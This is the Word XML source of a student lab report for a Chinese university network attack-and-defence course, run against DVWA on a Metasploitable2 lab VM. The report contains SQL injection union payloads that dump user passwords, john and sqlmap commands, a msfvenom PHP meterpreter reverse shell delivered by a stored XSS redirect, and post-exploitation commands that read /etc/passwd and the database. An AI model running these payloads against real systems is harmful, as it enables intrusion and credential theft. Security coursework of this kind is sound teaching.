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FE71F" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:after="100" w:line="240" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>实验报告模板</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F28E5E" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A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华南理工大学</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594C7A99" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A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《网络攻防原理与技术》课程实验报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6608203D" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:u w:val="single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</w:rPr>
        <w:t>实验题目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  <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="OLE_LINK6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>应用安全与防火墙</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C9AA23" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="828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86"/>
      </w:tblGrid>
      <w:tr w:rsidR="003145A4" w14:paraId="58569D29" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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0E2B9" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A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实验概述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003145A4" w14:paraId="797DEFE3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D81274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【实验目的及要求】</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3548967A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实验目的：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CC191D9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掌握</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>注入攻击和</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>XSS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>攻击</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69050F44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掌握在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>操作系统中配置防火墙</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="022790F4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掌握通过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UFW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配置防火墙</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42F08DAC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实验要求：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2177DFB2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独立完成</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ECD82D6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【实验环境】</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D21170B" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A">
            <w:pPr>
              <w:widowControl/>
              <w:ind w:firstLineChars="202" w:firstLine="424"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000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操作系统：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 xml:space="preserve">metasploit2 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，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kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003145A4" w14:paraId="23299840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8D112" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A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实验内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003145A4" w14:paraId="1A405504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29AB5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【实验方案设计】</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DB5C1DB" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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SQL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注入攻击</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40DADFED" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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XSS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攻击</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27CD5A32" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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Windows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防火墙配置</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C09F481" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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Linux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防火墙配置</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74F59F26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</w:p>
          <w:p w14:paraId="0DE76E0B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【实验过程】（实验步骤、记录、数据、分析）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02754B94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实验内容一：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SQL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注入攻击</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68E12D5A" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A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metasploitable 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地址为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192.168.56.102</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2195C591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79CB590" wp14:editId="11EE348D">
                  <wp:extent cx="3840480" cy="1164590"/>
                  <wp:effectExtent l="0" t="0" r="7620" b="6985"/>
                  <wp:docPr id="1" name="图片 1" descr="屏幕快照 2018-11-09 下午3.21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快照 2018-11-09 下午3.21.3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0" cy="116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91D6D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主机访问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http://192.168.56.102/dvwa/security.php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，设置安全级别为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low</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="037A9899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A62B386" wp14:editId="378E25A0">
                  <wp:extent cx="4300855" cy="3302000"/>
                  <wp:effectExtent l="0" t="0" r="4445" b="3175"/>
                  <wp:docPr id="3" name="图片 3" descr="屏幕快照 2018-11-09 下午3.29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快照 2018-11-09 下午3.29.2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855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CC953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3.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  <w:p w14:paraId="64044147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3462E09" wp14:editId="1660F0FB">
                  <wp:extent cx="3285490" cy="1502410"/>
                  <wp:effectExtent l="0" t="0" r="635" b="2540"/>
                  <wp:docPr id="4" name="图片 4" descr="屏幕快照 2018-11-09 下午3.22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快照 2018-11-09 下午3.22.5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49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492F9D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1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and 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‘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  <w:p w14:paraId="1CB46651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0097B44" wp14:editId="26CAAE61">
                  <wp:extent cx="3143250" cy="1507490"/>
                  <wp:effectExtent l="0" t="0" r="0" b="6985"/>
                  <wp:docPr id="5" name="图片 5" descr="屏幕快照 2018-11-09 下午3.27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屏幕快照 2018-11-09 下午3.27.5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5E174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and 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‘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</w:p>
          <w:p w14:paraId="75670989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48908E70" wp14:editId="6CB5384D">
                  <wp:extent cx="3451860" cy="932815"/>
                  <wp:effectExtent l="0" t="0" r="5715" b="635"/>
                  <wp:docPr id="6" name="图片 6" descr="屏幕快照 2018-11-09 下午3.39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屏幕快照 2018-11-09 下午3.39.2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5CA47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%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or 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‘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  <w:t>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  <w:p w14:paraId="668DC2D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F3DC519" wp14:editId="7FBF5C45">
                  <wp:extent cx="2644775" cy="4128770"/>
                  <wp:effectExtent l="0" t="0" r="3175" b="5080"/>
                  <wp:docPr id="7" name="图片 7" descr="屏幕快照 2018-11-09 下午3.39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屏幕快照 2018-11-09 下午3.39.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775" cy="412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94D2F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%' union select null, version() #</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3392E70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B43BD92" wp14:editId="20CC89A5">
                  <wp:extent cx="4421505" cy="1570990"/>
                  <wp:effectExtent l="0" t="0" r="7620" b="635"/>
                  <wp:docPr id="8" name="图片 8" descr="屏幕快照 2018-11-09 下午3.42.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屏幕快照 2018-11-09 下午3.42.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05" cy="157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6DBE7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%' union select null, user() #</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="731F0242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</w:p>
          <w:p w14:paraId="07A699E9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1C93F4E" wp14:editId="008E6E4E">
                  <wp:extent cx="4020185" cy="1647825"/>
                  <wp:effectExtent l="0" t="0" r="8890" b="0"/>
                  <wp:docPr id="9" name="图片 9" descr="屏幕快照 2018-11-09 下午3.43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快照 2018-11-09 下午3.43.4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8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B43E8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%' union select null, database() #</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3718E0F7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32A4714" wp14:editId="37F5B291">
                  <wp:extent cx="4012565" cy="1560830"/>
                  <wp:effectExtent l="0" t="0" r="6985" b="1270"/>
                  <wp:docPr id="10" name="图片 10" descr="屏幕快照 2018-11-09 下午3.44.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快照 2018-11-09 下午3.44.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6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B3AB9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%' union select null, table_name from information_schema.tables # </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2288A0A1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7D0440F" wp14:editId="3BCFD60E">
                  <wp:extent cx="4008120" cy="4363720"/>
                  <wp:effectExtent l="0" t="0" r="1905" b="8255"/>
                  <wp:docPr id="11" name="图片 11" descr="屏幕快照 2018-11-09 下午3.46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快照 2018-11-09 下午3.46.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20" cy="436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6F6A9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%' union select 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null, table_name from information_schema.tables where table_name like 'user%' #</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AB197BF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2F53B26D" wp14:editId="38F0C32F">
                  <wp:extent cx="3420110" cy="2729865"/>
                  <wp:effectExtent l="0" t="0" r="8890" b="3810"/>
                  <wp:docPr id="12" name="图片 12" descr="屏幕快照 2018-11-09 下午3.46.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快照 2018-11-09 下午3.46.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11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75906" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A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%' union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CBEFE78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77CB5C6" wp14:editId="56561C49">
                  <wp:extent cx="5121910" cy="4005580"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
                  <wp:docPr id="13" name="图片 13" descr="屏幕快照 2018-11-09 下午3.51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快照 2018-11-09 下午3.51.2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400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4F96B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将得到的用户信息拷贝到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john -format=raw-MD5 dvwa_password.txt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破解口令文件</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09513DB7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4087EE91" wp14:editId="39D8068B">
                  <wp:extent cx="5122545" cy="3447415"/>
                  <wp:effectExtent l="0" t="0" r="1905" b="635"/>
                  <wp:docPr id="14" name="图片 14" descr="屏幕快照 2018-11-09 下午4.00.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快照 2018-11-09 下午4.00.0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344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93FAB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退出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DVMA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重新登录，安全级别设置为中级，查看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cookie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matesploitable2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中输入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sqlmap -u "http://192.168.56.102/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit#" --cookie "security=medium;PHPSESSID=a28b457624412ceb3a5824454ff4a615"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检测是否可注入。在后面加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--dbs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抓取数据库信息</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39CC40B6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F7FE27B" wp14:editId="5820564F">
                  <wp:extent cx="4651375" cy="1895475"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="0"/>
                  <wp:docPr id="16" name="图片 16" descr="屏幕快照 2018-11-09 下午4.19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快照 2018-11-09 下午4.19.2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375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B6BCB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sqlmap -u "http://192.168.5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6.102/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit#" --cookie "security=medium;PHPSESSID=a28b457624412ceb3a5824454ff4a615"  -D dvwa --tables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查看表</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BC3373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B9BF56E" wp14:editId="592369E8">
                  <wp:extent cx="3568700" cy="1828800"/>
                  <wp:effectExtent l="0" t="0" r="3175" b="0"/>
                  <wp:docPr id="17" name="图片 17" descr="屏幕快照 2018-11-09 下午4.20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快照 2018-11-09 下午4.20.2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B1FF6" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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sqlmap -u "http://192.168.56.102/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit#" --cookie "security=medium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;PHPSESSID=a28b457624412ceb3a5824454ff4a615"  -D dvwa -T users --dump-all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抓取用户信息</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7076036B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EA2C751" wp14:editId="05C546B2">
                  <wp:extent cx="4686935" cy="2179955"/>
                  <wp:effectExtent l="0" t="0" r="8890" b="1270"/>
                  <wp:docPr id="18" name="图片 18" descr="屏幕快照 2018-11-09 下午4.21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快照 2018-11-09 下午4.21.4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35" cy="217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E252A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</w:p>
          <w:p w14:paraId="6E94C1DA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实验内容二：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攻击</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BDDC34D" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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重新登录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DVWA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，将安全级别设为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low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setup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重置数据库，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 store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中输入</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="659A4B98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C35CD16" wp14:editId="3709CE90">
                  <wp:extent cx="4144645" cy="2076450"/>
                  <wp:effectExtent l="0" t="0" r="8255" b="0"/>
                  <wp:docPr id="19" name="图片 19" descr="屏幕快照 2018-11-09 下午4.35.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快照 2018-11-09 下午4.35.0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64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E4630AC" wp14:editId="35C5FF77">
                  <wp:extent cx="3374390" cy="997585"/>
                  <wp:effectExtent l="0" t="0" r="6985" b="2540"/>
                  <wp:docPr id="20" name="图片 20" descr="屏幕快照 2018-11-09 下午4.33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快照 2018-11-09 下午4.33.4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390" cy="99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2F243" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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setup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重置数据库，重新在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 store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中输入</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6824F1B1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7E64EED" wp14:editId="296E93A5">
                  <wp:extent cx="5122545" cy="3451860"/>
                  <wp:effectExtent l="0" t="0" r="1905" b="5715"/>
                  <wp:docPr id="21" name="图片 21" descr="屏幕快照 2018-11-09 下午4.37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快照 2018-11-09 下午4.37.5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345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90F28" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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setup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重置数据库，重新在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 store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中输入</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FA7550A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222E79A" wp14:editId="601BBD6F">
                  <wp:extent cx="4305300" cy="2183130"/>
                  <wp:effectExtent l="0" t="0" r="0" b="7620"/>
                  <wp:docPr id="22" name="图片 22" descr="屏幕快照 2018-11-09 下午4.39.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快照 2018-11-09 下午4.39.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2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61C80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33F37E6" wp14:editId="4B502D99">
                  <wp:extent cx="4571365" cy="1591310"/>
                  <wp:effectExtent l="0" t="0" r="635" b="8890"/>
                  <wp:docPr id="23" name="图片 23" descr="屏幕快照 2018-11-09 下午4.39.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快照 2018-11-09 下午4.39.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365" cy="159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0395B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4.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msfvenom -p php/meterpreter/reverse_tcp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LHOST=192.168.56.10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>2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LPORT=4444 -f raw &gt; xss.php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（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的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>192.168.56.10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>2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）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3415569D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DF22584" wp14:editId="2D96181D">
                  <wp:extent cx="5113020" cy="674370"/>
                  <wp:effectExtent l="0" t="0" r="1905" b="1905"/>
                  <wp:docPr id="24" name="图片 24" descr="屏幕快照 2018-11-09 下午4.58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屏幕快照 2018-11-09 下午4.58.3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020" cy="6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896EF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5.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修改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xss.php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文件</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BB316C2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227DE3C" wp14:editId="7E858B7E">
                  <wp:extent cx="5120640" cy="1410970"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="8255"/>
                  <wp:docPr id="52" name="图片 52" descr="屏幕快照 2018-11-18 上午12.46.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屏幕快照 2018-11-18 上午12.46.1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41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CD257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6.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msfconsole -x "use exploit/multi/handler; set payload php/meterpreter/reverse_tcp; set LHOST 192.168.56.102; set LPORT 4444; run"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F9E207C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4456FF6" wp14:editId="56E50EB3">
                  <wp:extent cx="5123180" cy="1109980"/>
                  <wp:effectExtent l="0" t="0" r="1270" b="4445"/>
                  <wp:docPr id="60" name="图片 60" descr="屏幕快照 2018-11-18 上午1.03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屏幕快照 2018-11-18 上午1.03.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110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                           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                </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1050F676" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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DVWA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中上传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xss.php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文件</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D0BD64D" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="003145A4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</w:p>
          <w:p w14:paraId="1A28FBC0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C71DD2B" wp14:editId="273E82EE">
                  <wp:extent cx="5118735" cy="1193800"/>
                  <wp:effectExtent l="0" t="0" r="5715" b="6350"/>
                  <wp:docPr id="27" name="图片 27" descr="屏幕快照 2018-11-09 下午5.09.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屏幕快照 2018-11-09 下午5.09.0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EBBEF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8.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重置数据库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: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选择“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Setup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”，点击“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Create / Reset Database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，选择“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XSS Stored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”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="348C88BB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proofErr w:type="gramStart"/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Name:Test</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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-4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E663DA9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Message:&lt;script&gt;window.location="http://192.168.56.101/dvwa/hackable/uploads/xss.php"&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03583A11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431A2CE" wp14:editId="1F3F711C">
                  <wp:extent cx="4102100" cy="711200"/>
                  <wp:effectExtent l="0" t="0" r="3175" b="3175"/>
                  <wp:docPr id="61" name="图片 61" descr="屏幕快照 2018-11-18 上午1.30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屏幕快照 2018-11-18 上午1.30.3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0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83E18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9.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建立连接</w:t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FE30275" wp14:editId="22E220B1">
                  <wp:extent cx="5114925" cy="889000"/>
                  <wp:effectExtent l="0" t="0" r="0" b="6350"/>
                  <wp:docPr id="26" name="图片 26" descr="屏幕快照 2018-11-18 上午12.41.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快照 2018-11-18 上午12.41.0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80CE623" wp14:editId="01E5C3A1">
                  <wp:extent cx="5123180" cy="584200"/>
                  <wp:effectExtent l="0" t="0" r="1270" b="6350"/>
                  <wp:docPr id="2" name="图片 2" descr="屏幕快照 2018-11-18 上午12.42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快照 2018-11-18 上午12.42.2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5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30718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68EB514" wp14:editId="0BC5A5F3">
                  <wp:extent cx="3009900" cy="927100"/>
                  <wp:effectExtent l="0" t="0" r="0" b="6350"/>
                  <wp:docPr id="62" name="图片 62" descr="10321542723840_.pic_h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10321542723840_.pic_hd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3FE87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10.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whomai</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F6886F1" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A">
            <w:pPr>
              <w:widowControl/>
              <w:ind w:firstLineChars="400" w:firstLine="960"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grep www-data /etc/passwd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="580D95CE" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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find /var/www/* -print | grep config |grep </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C38D9E7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       grep "db_" /var/www/dvwa/config/config.inc.php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C0C3322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387C120D" wp14:editId="0ACD4E19">
                  <wp:extent cx="5124450" cy="1200150"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="63" name="图片 63" descr="10331542723846_.pic_h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10331542723846_.pic_hd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26C62" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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echo "use dvwa; show tables;" | mysql -uroot</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CD49496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       echo "use dvwa; desc users;" | mysql -uroot</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6255260B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       echo "select </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/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user,password</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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from dvwa.users;"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 xml:space="preserve"> | mysql -uroot</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77A14EE2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139D29A" wp14:editId="2251164B">
                  <wp:extent cx="3835400" cy="2749550"/>
                  <wp:effectExtent l="0" t="0" r="3175" b="3175"/>
                  <wp:docPr id="64" name="图片 64" descr="10341542723853_.pic_h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10341542723853_.pic_hd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400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C1A9C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BD10581" wp14:editId="3CCCE511">
                  <wp:extent cx="4591050" cy="1492250"/>
                  <wp:effectExtent l="0" t="0" r="0" b="3175"/>
                  <wp:docPr id="65" name="图片 65" descr="10351542723859_.pic_h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10351542723859_.pic_hd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5725E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实验内容三：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Windows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防火墙</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EB153A0" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A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打开防火墙</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43E1D294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B7C8C0A" wp14:editId="1415291D">
                  <wp:extent cx="4681855" cy="3612515"/>
                  <wp:effectExtent l="0" t="0" r="4445" b="6985"/>
                  <wp:docPr id="28" name="图片 28" descr="屏幕快照 2018-11-09 下午5.38.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屏幕快照 2018-11-09 下午5.38.1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55" cy="361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84D1C" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A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ipconfig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查看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ip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地址为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192.168.56.104</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B9300BD" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A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ping192.168.56.104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ping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不通</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31903D22" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A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防火墙配置</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05861F77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0AD6E9F9" wp14:editId="71DA9DEA">
                  <wp:extent cx="5119370" cy="3851910"/>
                  <wp:effectExtent l="0" t="0" r="5080" b="5715"/>
                  <wp:docPr id="35" name="图片 35" descr="屏幕快照 2018-11-09 下午5.47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屏幕快照 2018-11-09 下午5.47.4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38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AE91D81" wp14:editId="0C1DD5AD">
                  <wp:extent cx="5121275" cy="4631690"/>
                  <wp:effectExtent l="0" t="0" r="3175" b="6985"/>
                  <wp:docPr id="34" name="图片 34" descr="屏幕快照 2018-11-09 下午5.48.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屏幕快照 2018-11-09 下午5.48.0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463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F9B1268" wp14:editId="2B1E0157">
                  <wp:extent cx="5123815" cy="4171315"/>
                  <wp:effectExtent l="0" t="0" r="635" b="635"/>
                  <wp:docPr id="33" name="图片 33" descr="屏幕快照 2018-11-09 下午5.49.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屏幕快照 2018-11-09 下午5.49.0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417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9262D43" wp14:editId="08A34832">
                  <wp:extent cx="5122545" cy="4066540"/>
                  <wp:effectExtent l="0" t="0" r="1905" b="635"/>
                  <wp:docPr id="32" name="图片 32" descr="屏幕快照 2018-11-09 下午5.49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屏幕快照 2018-11-09 下午5.49.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406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B156C5E" wp14:editId="7FEB59EA">
                  <wp:extent cx="5120640" cy="4045585"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="2540"/>
                  <wp:docPr id="31" name="图片 31" descr="屏幕快照 2018-11-09 下午5.50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屏幕快照 2018-11-09 下午5.50.1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404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2E56B4F" wp14:editId="36526E92">
                  <wp:extent cx="5118100" cy="4155440"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="6985"/>
                  <wp:docPr id="30" name="图片 30" descr="屏幕快照 2018-11-09 下午5.50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屏幕快照 2018-11-09 下午5.50.3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368ABB7" wp14:editId="31903956">
                  <wp:extent cx="5122545" cy="4121150"/>
                  <wp:effectExtent l="0" t="0" r="1905" b="3175"/>
                  <wp:docPr id="29" name="图片 29" descr="屏幕快照 2018-11-09 下午5.50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屏幕快照 2018-11-09 下午5.50.5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412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71D11B" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="003145A4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</w:p>
          <w:p w14:paraId="7A6FA71C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4F47861" wp14:editId="31BAD670">
                  <wp:extent cx="5119370" cy="4063365"/>
                  <wp:effectExtent l="0" t="0" r="5080" b="3810"/>
                  <wp:docPr id="36" name="图片 36" descr="屏幕快照 2018-11-09 下午5.51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屏幕快照 2018-11-09 下午5.51.2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406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AE71E" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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再次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ping 192.168.56.104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，已经可以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ping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通</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28312CD0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7C15F2D" wp14:editId="006D2F0C">
                  <wp:extent cx="5120005" cy="1456690"/>
                  <wp:effectExtent l="0" t="0" r="4445" b="635"/>
                  <wp:docPr id="37" name="图片 37" descr="屏幕快照 2018-11-09 下午5.52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屏幕快照 2018-11-09 下午5.52.1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145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0E2E9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实验内容四：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Linux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防火墙</w:t>
            </w:r>
          </w:p>
